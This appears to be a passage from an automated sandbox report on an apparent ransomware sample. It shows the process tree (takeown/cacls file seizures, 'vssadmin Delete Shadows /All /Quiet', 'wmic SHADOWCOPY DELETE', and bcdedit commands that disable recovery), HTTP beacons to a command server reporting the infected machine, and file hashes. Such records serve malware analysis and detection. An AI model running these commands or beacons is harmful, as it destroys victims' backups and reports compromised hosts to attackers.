C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Users\All Users\USOShared\Logs\System\UpdateSessionOrchestration.e2f832ce-4b0e-4e72-befe-61d8bcc2c7ec.1.etl""2⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\USOShared\Logs\System\UpdateSessionOrchestration.e2f832ce-4b0e-4e72-befe-61d8bcc2c7ec.1.etl" /E /G Admin:F /C3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\USOShared\Logs\System\UpdateSessionOrchestration.e2f832ce-4b0e-4e72-befe-61d8bcc2c7ec.1.etl"3⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "UpdateSessionOrchestration.e2f832ce-4b0e-4e72-befe-61d8bcc2c7ec.1.etl" -nobanner3⤵
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "UpdateSessionOrchestration.e2f832ce-4b0e-4e72-befe-61d8bcc2c7ec.1.etl" -nobanner4⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Users\All Users\Microsoft\UEV\Scripts\RegisterInboxTemplates.ps1""2⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\UEV\Scripts\RegisterInboxTemplates.ps1" /E /G Admin:F /C3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\UEV\Scripts\RegisterInboxTemplates.ps1"3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "RegisterInboxTemplates.ps1" -nobanner3⤵
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "RegisterInboxTemplates.ps1" -nobanner4⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Users\All Users\USOShared\Logs\System\NotificationUxBroker.cd09c61e-9532-450b-b7b3-7b652f7242c0.1.etl""2⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\USOShared\Logs\System\NotificationUxBroker.cd09c61e-9532-450b-b7b3-7b652f7242c0.1.etl" /E /G Admin:F /C3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\USOShared\Logs\System\NotificationUxBroker.cd09c61e-9532-450b-b7b3-7b652f7242c0.1.etl"3⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "NotificationUxBroker.cd09c61e-9532-450b-b7b3-7b652f7242c0.1.etl" -nobanner3⤵
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "NotificationUxBroker.cd09c61e-9532-450b-b7b3-7b652f7242c0.1.etl" -nobanner4⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013.xsd""2⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013.xsd" /E /G Admin:F /C3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013.xsd"3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "SettingsLocationTemplate2013.xsd" -nobanner3⤵
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "SettingsLocationTemplate2013.xsd" -nobanner4⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Users\All Users\USOShared\Logs\System\UpdateSessionOrchestration.7a2de38e-949f-499d-a7e9-32fec9ad3dcd.1.etl""2⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\USOShared\Logs\System\UpdateSessionOrchestration.7a2de38e-949f-499d-a7e9-32fec9ad3dcd.1.etl" /E /G Admin:F /C3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\USOShared\Logs\System\UpdateSessionOrchestration.7a2de38e-949f-499d-a7e9-32fec9ad3dcd.1.etl"3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "UpdateSessionOrchestration.7a2de38e-949f-499d-a7e9-32fec9ad3dcd.1.etl" -nobanner3⤵
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "UpdateSessionOrchestration.7a2de38e-949f-499d-a7e9-32fec9ad3dcd.1.etl" -nobanner4⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png""2⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png" /E /G Admin:F /C3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png"3⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "superbar.png" -nobanner3⤵
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "superbar.png" -nobanner4⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Users\All Users\USOShared\Logs\System\MoUsoCoreWorker.c330a520-7e4a-47d1-a1bb-6cc187fdef4d.1.etl""2⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\USOShared\Logs\System\MoUsoCoreWorker.c330a520-7e4a-47d1-a1bb-6cc187fdef4d.1.etl" /E /G Admin:F /C3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\USOShared\Logs\System\MoUsoCoreWorker.c330a520-7e4a-47d1-a1bb-6cc187fdef4d.1.etl"3⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "MoUsoCoreWorker.c330a520-7e4a-47d1-a1bb-6cc187fdef4d.1.etl" -nobanner3⤵
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "MoUsoCoreWorker.c330a520-7e4a-47d1-a1bb-6cc187fdef4d.1.etl" -nobanner4⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Users\All Users\Microsoft\AppV\Setup\OfficeIntegrator.ps1""2⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\AppV\Setup\OfficeIntegrator.ps1" /E /G Admin:F /C3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\AppV\Setup\OfficeIntegrator.ps1"3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "OfficeIntegrator.ps1" -nobanner3⤵
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "OfficeIntegrator.ps1" -nobanner4⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png""2⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png" /E /G Admin:F /C3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png"3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "background.png" -nobanner3⤵
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "background.png" -nobanner4⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Users\All Users\Microsoft\Storage Health\StorageHealthModel.dat""2⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Storage Health\StorageHealthModel.dat" /E /G Admin:F /C3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Storage Health\StorageHealthModel.dat"3⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "StorageHealthModel.dat" -nobanner3⤵
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "StorageHealthModel.dat" -nobanner4⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Users\All Users\USOShared\Logs\System\NotificationUxBroker.1fc87425-c5fb-454c-8d3a-131a11dfac63.1.etl""2⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\USOShared\Logs\System\NotificationUxBroker.1fc87425-c5fb-454c-8d3a-131a11dfac63.1.etl" /E /G Admin:F /C3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\USOShared\Logs\System\NotificationUxBroker.1fc87425-c5fb-454c-8d3a-131a11dfac63.1.etl"3⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "NotificationUxBroker.1fc87425-c5fb-454c-8d3a-131a11dfac63.1.etl" -nobanner3⤵
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "NotificationUxBroker.1fc87425-c5fb-454c-8d3a-131a11dfac63.1.etl" -nobanner4⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd""2⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd" /E /G Admin:F /C3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd"3⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "SettingsLocationTemplate.xsd" -nobanner3⤵
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "SettingsLocationTemplate.xsd" -nobanner4⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Users\All Users\USOShared\Logs\System\UpdateSessionOrchestration.5e2fe5c7-5b22-43a2-b74d-97686fd70486.1.etl""2⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\USOShared\Logs\System\UpdateSessionOrchestration.5e2fe5c7-5b22-43a2-b74d-97686fd70486.1.etl" /E /G Admin:F /C3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\USOShared\Logs\System\UpdateSessionOrchestration.5e2fe5c7-5b22-43a2-b74d-97686fd70486.1.etl"3⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "UpdateSessionOrchestration.5e2fe5c7-5b22-43a2-b74d-97686fd70486.1.etl" -nobanner3⤵
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "UpdateSessionOrchestration.5e2fe5c7-5b22-43a2-b74d-97686fd70486.1.etl" -nobanner4⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵
-
-
-
C:\Windows\SYSTEM32\cmd.exeC:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Ct7Xyoqg.bat"1⤵
-
C:\Windows\system32\vssadmin.exevssadmin Delete Shadows /All /Quiet2⤵
- Interacts with shadow copies
-
-
C:\Windows\System32\Wbem\WMIC.exewmic SHADOWCOPY DELETE2⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No2⤵
- Modifies boot configuration data using bcdedit
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Delete /TN DSHCA /F2⤵
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
Network
-
DNSjostat.mygoodsday.orgRemote address:8.8.8.8:53Requestjostat.mygoodsday.orgIN AResponsejostat.mygoodsday.orgIN A35.205.61.67 -
GEThttp://jostat.mygoodsday.org/addrecord.php?apikey=kok08_api_key&compuser=GBQHURCC|Admin&sid=dMYzDrTBvyyXT9qX&phase=STARTRemote address:35.205.61.67:80RequestGET /addrecord.php?apikey=kok08_api_key&compuser=GBQHURCC|Admin&sid=dMYzDrTBvyyXT9qX&phase=START HTTP/1.0
Host: jostat.mygoodsday.org
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; Synapse)
ResponseHTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Wed, 28 Dec 2022 18:36:11 GMT
Content-Type: text/html
Connection: close
Set-Cookie: btst=84221f17ba2c75e54fd78f73813be7da|154.61.71.13|1672252571|1672252571|0|1|0; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Location: 1
-
DNSmyexternalip.comRemote address:8.8.8.8:53Requestmyexternalip.comIN AResponsemyexternalip.comIN A34.160.111.145
-
GEThttp://myexternalip.com/rawRemote address:34.160.111.145:80RequestGET /raw HTTP/1.1
Host: myexternalip.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
access-control-allow-origin: *
content-type: text/html; charset=utf-8
content-length: 12
date: Wed, 28 Dec 2022 18:36:15 GMT
x-envoy-upstream-service-time: 1
strict-transport-security: max-age=2592000; includeSubDomains
server: istio-envoy
Via: 1.1 google
-
GEThttp://jostat.mygoodsday.org/addrecord.php?apikey=kok08_api_key&compuser=GBQHURCC|Admin&sid=dMYzDrTBvyyXT9qX&phase=[ALL]4BF721F60ECA75D6Remote address:35.205.61.67:80RequestGET /addrecord.php?apikey=kok08_api_key&compuser=GBQHURCC|Admin&sid=dMYzDrTBvyyXT9qX&phase=[ALL]4BF721F60ECA75D6 HTTP/1.0
Host: jostat.mygoodsday.org
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; Synapse)
ResponseHTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Wed, 28 Dec 2022 18:36:21 GMT
Content-Type: text/html
Connection: close
Set-Cookie: btst=572ef4d7035bedff7c1775a3f2eee0a2|154.61.71.13|1672252581|1672252581|0|1|0; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Location: 1
-
GEThttp://jostat.mygoodsday.org/addrecord.php?apikey=kok08_api_key&compuser=GBQHURCC|Admin&sid=dMYzDrTBvyyXT9qX&phase=4BF721F60ECA75D6|3317|3GBRemote address:35.205.61.67:80RequestGET /addrecord.php?apikey=kok08_api_key&compuser=GBQHURCC|Admin&sid=dMYzDrTBvyyXT9qX&phase=4BF721F60ECA75D6|3317|3GB HTTP/1.0
Host: jostat.mygoodsday.org
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; Synapse)
ResponseHTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Wed, 28 Dec 2022 18:36:22 GMT
Content-Type: text/html
Connection: close
Set-Cookie: btst=cbd75f1388dbbcaab4a183d2820e22db|154.61.71.13|1672252582|1672252582|0|1|0; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Location: 1
-
GEThttp://myexternalip.com/rawRemote address:34.160.111.145:80RequestGET /raw HTTP/1.1
Host: myexternalip.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
access-control-allow-origin: *
content-type: text/html; charset=utf-8
content-length: 12
date: Wed, 28 Dec 2022 18:36:23 GMT
x-envoy-upstream-service-time: 2
strict-transport-security: max-age=2592000; includeSubDomains
server: istio-envoy
Via: 1.1 google
-
GEThttp://jostat.mygoodsday.org/addrecord.php?apikey=kok08_api_key&compuser=GBQHURCC|Admin&sid=dMYzDrTBvyyXT9qX&phase=FINISHRemote address:35.205.61.67:80RequestGET /addrecord.php?apikey=kok08_api_key&compuser=GBQHURCC|Admin&sid=dMYzDrTBvyyXT9qX&phase=FINISH HTTP/1.0
Host: jostat.mygoodsday.org
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; Synapse)
ResponseHTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Wed, 28 Dec 2022 18:37:05 GMT
Content-Type: text/html
Connection: close
Set-Cookie: btst=c89cccd702bd0ad6d4bfb9535d048dda|154.61.71.13|1672252625|1672252625|0|1|0; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Location: 1
-
GEThttp://jostat.mygoodsday.org/addrecord.php?apikey=kok08_api_key&compuser=GBQHURCC|Admin&sid=dMYzDrTBvyyXT9qX&phase=[FIN]4BF721F60ECA75D6|3247|70|3317Remote address:35.205.61.67:80RequestGET /addrecord.php?apikey=kok08_api_key&compuser=GBQHURCC|Admin&sid=dMYzDrTBvyyXT9qX&phase=[FIN]4BF721F60ECA75D6|3247|70|3317 HTTP/1.0
Host: jostat.mygoodsday.org
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; Synapse)
ResponseHTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Wed, 28 Dec 2022 18:37:04 GMT
Content-Type: text/html
Connection: close
Set-Cookie: btst=de783440c57dd44bd8bc08120fa57321|154.61.71.13|1672252624|1672252624|0|1|0; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Location: 1
-
35.205.61.67:80http://jostat.mygoodsday.org/addrecord.php?apikey=kok08_api_key&compuser=GBQHURCC|Admin&sid=dMYzDrTBvyyXT9qX&phase=STARThttp
HTTP Request
GET http://jostat.mygoodsday.org/addrecord.php?apikey=kok08_api_key&compuser=GBQHURCC|Admin&sid=dMYzDrTBvyyXT9qX&phase=STARTHTTP Response
302 -
34.160.111.145:80http://myexternalip.com/rawhttp
HTTP Request
GET http://myexternalip.com/rawHTTP Response
200 -
35.205.61.67:80http://jostat.mygoodsday.org/addrecord.php?apikey=kok08_api_key&compuser=GBQHURCC|Admin&sid=dMYzDrTBvyyXT9qX&phase=[ALL]4BF721F60ECA75D6http
HTTP Request
GET http://jostat.mygoodsday.org/addrecord.php?apikey=kok08_api_key&compuser=GBQHURCC|Admin&sid=dMYzDrTBvyyXT9qX&phase=[ALL]4BF721F60ECA75D6HTTP Response
302 -
35.205.61.67:80http://jostat.mygoodsday.org/addrecord.php?apikey=kok08_api_key&compuser=GBQHURCC|Admin&sid=dMYzDrTBvyyXT9qX&phase=4BF721F60ECA75D6|3317|3GBhttp
HTTP Request
GET http://jostat.mygoodsday.org/addrecord.php?apikey=kok08_api_key&compuser=GBQHURCC|Admin&sid=dMYzDrTBvyyXT9qX&phase=4BF721F60ECA75D6|3317|3GBHTTP Response
302 -
34.160.111.145:80http://myexternalip.com/rawhttp
HTTP Request
GET http://myexternalip.com/rawHTTP Response
200 -
8.238.21.126:80
-
204.79.197.200:443www.bing.comtls, https
-
20.42.65.90:443
-
93.184.221.240:80
-
93.184.221.240:80
-
93.184.221.240:80
-
35.205.61.67:80http://jostat.mygoodsday.org/addrecord.php?apikey=kok08_api_key&compuser=GBQHURCC|Admin&sid=dMYzDrTBvyyXT9qX&phase=FINISHhttp
HTTP Request
GET http://jostat.mygoodsday.org/addrecord.php?apikey=kok08_api_key&compuser=GBQHURCC|Admin&sid=dMYzDrTBvyyXT9qX&phase=FINISHHTTP Response
302 -
35.205.61.67:80http://jostat.mygoodsday.org/addrecord.php?apikey=kok08_api_key&compuser=GBQHURCC|Admin&sid=dMYzDrTBvyyXT9qX&phase=[FIN]4BF721F60ECA75D6|3247|70|3317http
HTTP Request
GET http://jostat.mygoodsday.org/addrecord.php?apikey=kok08_api_key&compuser=GBQHURCC|Admin&sid=dMYzDrTBvyyXT9qX&phase=[FIN]4BF721F60ECA75D6|3247|70|3317HTTP Response
302
-
8.8.8.8:53jostat.mygoodsday.orgdns
DNS Request
jostat.mygoodsday.org
DNS Response
35.205.61.67
-
8.8.8.8:53myexternalip.comdns
DNS Request
myexternalip.com
DNS Response
34.160.111.145
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD54280e36a29fa31c01e4d8b2ba726a0d8
SHA1c485c2c9ce0a99747b18d899b71dfa9a64dabe32
SHA256e2486a1bdcba80dad6dd6210d7374bd70ae196a523c06ceda71370fd3ea78359
SHA512494fe5f0ade03669e5830bed93c964d69b86629440148d7b0881cf53203fd89443ebff9b4d1ee9d96244f62af6edede622d9eacba37f80f389a0d522e4ad4ea4
-
Filesize
16KB
MD5eb40467e71e492b92ee8504bfcabc4f5
SHA1d7d6b179124e93010a34bebf8af2c46187dbc26d
SHA256e4d1e562d3b5b8d290eec056979f2f6973ca3fd398c23992db33605a78e5ec3f
SHA512d889dbf66576babc41a94c12cc9754ffe6180d67feeaca08ff02ed19a8b9b1ca691e1e85226ebaaef45adb7f71fc2e36f9ee0f1cc80635176c8a2455ebda1c5e
-
Filesize
74B
MD5fd0c3fc7314166b6c7c62768b6169aae
SHA118a35dc67f43a690483d6365788b40d9f1ff0f43
SHA25671d1ded027b19776100d01285365b2af5eac174ca7a35641c8b5900ae0495fef
SHA51249241c10796bb10fa466aca038275e20d267931c14c24972ed3847059ccff4410d3800fb5875882201c1bf602bb43464aeac51cfe907b44b19c04951c8a112d3
-
Filesize
14B
MD58eb51985066cb0782077f624013d47a2
SHA10549d07d51454e73b937946ba1887cacfce71835
SHA2565537d10911f09132033b185344f75ea1a0ed7e5509b3be00bd8bc93d477baa44
SHA512539a7160bb41366a74d8859b080724f5838132428f672c2bba7ef9c9a259823f15074adec75567bea6724f09d681c04b8763a2f495eff3436ff17420cb7bf0f5
-
Filesize
1.2MB
MD5c50c17057fc6ea67bc579196f1f73712
SHA144495db58fa7c94db840a3f696c8f546a5fce2d1
SHA25667144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a
SHA5127c5eb6317b0a51ae93302adb223d6163a5c771d5b1d8d77462c2463c37f32e0f7f957526a36e39ae5272687e4ebe2faf2d02e68601bc87afc95fc9d7145538aa
-
Filesize
1.2MB
MD5c50c17057fc6ea67bc579196f1f73712
SHA144495db58fa7c94db840a3f696c8f546a5fce2d1
SHA25667144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a
SHA5127c5eb6317b0a51ae93302adb223d6163a5c771d5b1d8d77462c2463c37f32e0f7f957526a36e39ae5272687e4ebe2faf2d02e68601bc87afc95fc9d7145538aa
-
Filesize
181KB
MD52f5b509929165fc13ceab9393c3b911d
SHA1b016316132a6a277c5d8a4d7f3d6e2c769984052
SHA2560cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4
SHA512c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8
-
Filesize
181KB
MD52f5b509929165fc13ceab9393c3b911d
SHA1b016316132a6a277c5d8a4d7f3d6e2c769984052
SHA2560cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4
SHA512c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8
-
Filesize
181KB
MD52f5b509929165fc13ceab9393c3b911d
SHA1b016316132a6a277c5d8a4d7f3d6e2c769984052
SHA2560cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4
SHA512c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8
-
Filesize
181KB
MD52f5b509929165fc13ceab9393c3b911d
SHA1b016316132a6a277c5d8a4d7f3d6e2c769984052
SHA2560cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4
SHA512c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8
-
Filesize
181KB
MD52f5b509929165fc13ceab9393c3b911d
SHA1b016316132a6a277c5d8a4d7f3d6e2c769984052
SHA2560cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4
SHA512c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8
-
Filesize
181KB
MD52f5b509929165fc13ceab9393c3b911d
SHA1b016316132a6a277c5d8a4d7f3d6e2c769984052
SHA2560cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4
SHA512c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8
-
Filesize
181KB
MD52f5b509929165fc13ceab9393c3b911d
SHA1b016316132a6a277c5d8a4d7f3d6e2c769984052
SHA2560cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4
SHA512c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8
-
Filesize
181KB
MD52f5b509929165fc13ceab9393c3b911d
SHA1b016316132a6a277c5d8a4d7f3d6e2c769984052
SHA2560cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4
